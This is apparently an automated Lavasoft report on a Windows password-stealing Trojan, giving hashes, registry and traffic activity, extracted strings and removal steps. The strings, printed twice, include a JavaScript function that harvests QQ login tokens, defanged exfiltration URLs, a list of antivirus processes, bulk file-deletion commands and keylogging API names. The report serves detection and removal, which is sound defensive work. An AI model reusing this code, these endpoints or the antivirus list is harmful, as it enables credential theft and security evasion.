Trojan.Win32.FlyStudio_2ea4ff5287
Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 2ea4ff528727017b75eed48a25de2720
SHA1: 9925ba64d60eb6bb4c1c82207b5ddd2dc04cc27c
SHA256: 886e7e2bd99dbdce4057be183c324195108b422a59c219687b30a1ce9df75583
SSDeep: 24576:O/eVybOioXmcZq/TYpWY77Fw877oYabHmMdC9gW7f37EfnI4/kESO4ux:dVYOioW5/T6Nq83otL3digW7f3ER/kzQ
Size: 1179148 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-10-29 20:10:01
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
%original file name%.exe:1100
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1100 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
Registry activity
The process %original file name%.exe:1100 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 0F 91 90 92 7D CF 75 5D D9 39 CF 76 AF 84 E4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"
The Trojan modifies IE security-zone settings so that all local web nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name:
Product Name: mdcfgj
Product Version: 8.2.1.1
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 8.2.1.1
File Description: mdcfgj
Comments: mdcfgj
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 1286144 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 1290240 | 1150976 | 1150464 | 5.46169 | 26dbb0dbdc01d3981b57add05b711572 |
| .rsrc | 2441216 | 28672 | 27648 | 4.01206 | af898ee1a1ac77cc313b7e0e56cc3793 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 2
24c2d3b1ab6201e9b7f9e8f02ce0b424
4475551e0d9a5dfa89ba3c5806064740
URLs
| URL | IP |
|---|---|
| hxxp://w1d2wodescak.a5.namepu.com/CFckh/message.txt | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /CFckh/message.txt HTTP/1.1
Referer: hXXp://w1d2wodescak.a5.namepu.com/CFckh/message.txt
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: w1d2wodescak.a5.namepu.com
Cache-Control: no-cache
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Tue, 04 Aug 2015 08:38:04 GMT
Content-Length: 1163
The Trojan connects to the servers at the following location(s):
atl.dll
user32.dll
kernel32.dll
wininet.dll
gdi32.dll
MsgWaitForMultipleObjects
ExitWindowsEx
MapVirtualKeyA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
GetAsyncKeyState
GetWindowsDirectoryA
UnhookWindowsHookEx
GetKeyState
hXXp://VVV.pet1990.com/tmp.asp?id=
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};adminakang_kn_VVV.52blt.net_sujiankangwoaini!
crossfire.exe
[LoginUserRecord]
IsRecordPass=0
Client.exe
LoginQ.dat
Msimg32.dll
crossfire.exe
tc_url=[
cwburl=[
pay.title=[
hXXp://
hXXps://
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
HTTP/1.1
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
del /f /s /q "C:\chuanyuehuoxian\*.exe"
del /f /s /q "C:\chuanyuehuoxian\*.bat"
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
TCLS\Client.exe
avp.exe
ashDisp.exe
ccSvrHst.exe
avcenter.exe
secenter.exe
spiderui.exe
egui.exe
mcupdui.exe
KvMonXP.exe
RavMonD.exe
kavstart.exe
360sd.exe
FilMsg.exe
360Tray.exe
QQPCTray.exe
BaiduSdSvc.exe
/id.txt
post_asp3.asp?Number=
/post_xinxi3.asp?name=2051C9
/post_xinxi3.asp?name=
/post_xinxi.asp?name=6986
msxml2.XMLHTTP
hXXp://w1d2wodescak.a5.namepu.com/
858583725
VVV.3600gz.cn
VVV.meitu.com
hXXp://open.baidu.com/special/time/
window.baidu_time(
hXXp://VVV.xici.net.co/
\Mdserver.ini
/regdate.txt
/delf.asp
MDserver.exe
100 = 100
(MDserver.exe),
\MDserver.exe
.dll,OpenProcess
hXXp://e.*9
p00gz.cn|
ADVAPI32.dll
comdlg32.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
RegCloseKey
ShellExecuteA
Mdserver.exe
Mdserver.ini
\QQLogin.exe
/id2.txt
/post_xinxi.asp?name=
\MDserver.ini
hXXp://w1d2wodescak.a5.namepu.com/bug/post_bug.asp?bug=
hXXp://VVV.pet1990.com/?gy
Super-EChXXp://VVV.super-ec.cnhXXp://VVV.eyybc.com/forum-17-1.html/forum-12-1.html/memcp.php/ip.asp/time.asp/gonggao.txt/ec-user6.php/ec-bd.php/ec-jh.php
hXXp://VVV.super-ec.cn
<input type="text" name="field_2new" size="25" value="" disabled class="txt" />" class="txt" />Function Getcpuid()
Set cpuSet = GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_Processor")getcpuid=cpu.ProcessorId
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)
InternetOpenUrlA
eyybc.com
super-ec.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HttpAddRequestHeadersA
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies
\*.txt
scripting.FileSystemObject
%Documents and Settings%\IBM\Cookies\*.txt
Content.IE5\
(@ole32.dll
858583725
QQ.txt
|*.txt
hXXp://pan.baidu.com/s/123q7b
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
iphlpapi.dll
SHLWAPI.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
\\.\Scsi0:
\\.\PhysicalDrive0
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
VVV.dywt.com.cn
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
%d%d%d
rundll32.exe shell32.dll,
(*.htm;*.html)|*.htm;*.html
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
Fckh/message.txt
ge.txt
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
WinExec
GetProcessHeap
RegOpenKeyExA
RegCreateKeyExA
GetViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
SetWindowsHookExA
GetKeyboardLayout
VkKeyScanExA
keybd_event
RegisterHotKey
UnregisterHotKey
CreateDialogIndirectParamA
InternetCanonicalizeUrlA
InternetCrackUrlA
.text
`.rdata
@.data
oledlg.dll
RASAPI32.dll
WININET.dll
1, 0, 6, 6
- Skin.dll
88.88.5.41
{7BF80980-BF32-101A-8BBB-00AA00300CAB}(*.*)
8.2.1.1
%original file name%.exe_1100_rwx_00401000_00252000:
t%SVh
t$(SSh
|$D.tm
~%UVW
u$SShe
atl.dll
user32.dll
kernel32.dll
wininet.dll
gdi32.dll
MsgWaitForMultipleObjects
ExitWindowsEx
MapVirtualKeyA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
GetAsyncKeyState
GetWindowsDirectoryA
UnhookWindowsHookEx
GetKeyState
hXXp://VVV.pet1990.com/tmp.asp?id=
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};adminakang_kn_VVV.52blt.net_sujiankangwoaini!
crossfire.exe
[LoginUserRecord]
IsRecordPass=0
Client.exe
LoginQ.dat
Msimg32.dll
crossfire.exe
tc_url=[
cwburl=[
pay.title=[
hXXp://
hXXps://
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
HTTP/1.1
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
.rsrc
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
del /f /s /q "C:\chuanyuehuoxian\*.exe"
del /f /s /q "C:\chuanyuehuoxian\*.bat"
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
TCLS\Client.exe
avp.exe
ashDisp.exe
ccSvrHst.exe
avcenter.exe
secenter.exe
spiderui.exe
egui.exe
mcupdui.exe
KvMonXP.exe
RavMonD.exe
kavstart.exe
360sd.exe
FilMsg.exe
360Tray.exe
QQPCTray.exe
BaiduSdSvc.exe
/id.txt
post_asp3.asp?Number=
/post_xinxi3.asp?name=2051C9
/post_xinxi3.asp?name=
/post_xinxi.asp?name=6986
msxml2.XMLHTTP
hXXp://w1d2wodescak.a5.namepu.com/
858583725
VVV.3600gz.cn
VVV.meitu.com
hXXp://open.baidu.com/special/time/
window.baidu_time(
hXXp://VVV.xici.net.co/
\Mdserver.ini
/regdate.txt
/delf.asp
MDserver.exe
100 = 100
(MDserver.exe),
\MDserver.exe
.dll,OpenProcess
ADVAPI32.dll
comdlg32.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
RegCloseKey
ShellExecuteA
Mdserver.exe
Mdserver.ini
\QQLogin.exe
/id2.txt
/post_xinxi.asp?name=
\MDserver.ini
hXXp://w1d2wodescak.a5.namepu.com/bug/post_bug.asp?bug=
hXXp://VVV.pet1990.com/?gy
Super-EChXXp://VVV.super-ec.cnhXXp://VVV.eyybc.com/forum-17-1.html/forum-12-1.html/memcp.php/ip.asp/time.asp/gonggao.txt/ec-user6.php/ec-bd.php/ec-jh.php
hXXp://VVV.super-ec.cn
<input type="text" name="field_2new" size="25" value="" disabled class="txt" />" class="txt" />Function Getcpuid()
Set cpuSet = GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_Processor")getcpuid=cpu.ProcessorId
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)
InternetOpenUrlA
eyybc.com
super-ec.cn
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HttpAddRequestHeadersA
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies
\*.txt
scripting.FileSystemObject
%Documents and Settings%\IBM\Cookies\*.txt
Content.IE5\
(@ole32.dll
858583725
QQ.txt
|*.txt
hXXp://pan.baidu.com/s/123q7b
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
iphlpapi.dll
SHLWAPI.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
\\.\Scsi0:
\\.\PhysicalDrive0
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
VVV.dywt.com.cn
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
%d%d%d
rundll32.exe shell32.dll,
(*.htm;*.html)|*.htm;*.html
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
Fckh/message.txt
ge.txt
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
WinExec
GetProcessHeap
RegOpenKeyExA
RegCreateKeyExA
GetViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
SetWindowsHookExA
GetKeyboardLayout
VkKeyScanExA
keybd_event
RegisterHotKey
UnregisterHotKey
CreateDialogIndirectParamA
InternetCanonicalizeUrlA
InternetCrackUrlA
.text
`.rdata
@.data
1, 0, 6, 6
- Skin.dll
88.88.5.41
{7BF80980-BF32-101A-8BBB-00AA00300CAB}(*.*)
%original file name%.exe_1100_rwx_10000000_0003E000:
`.rsrc
msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
1, 0, 6, 6
- Skin.dll
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.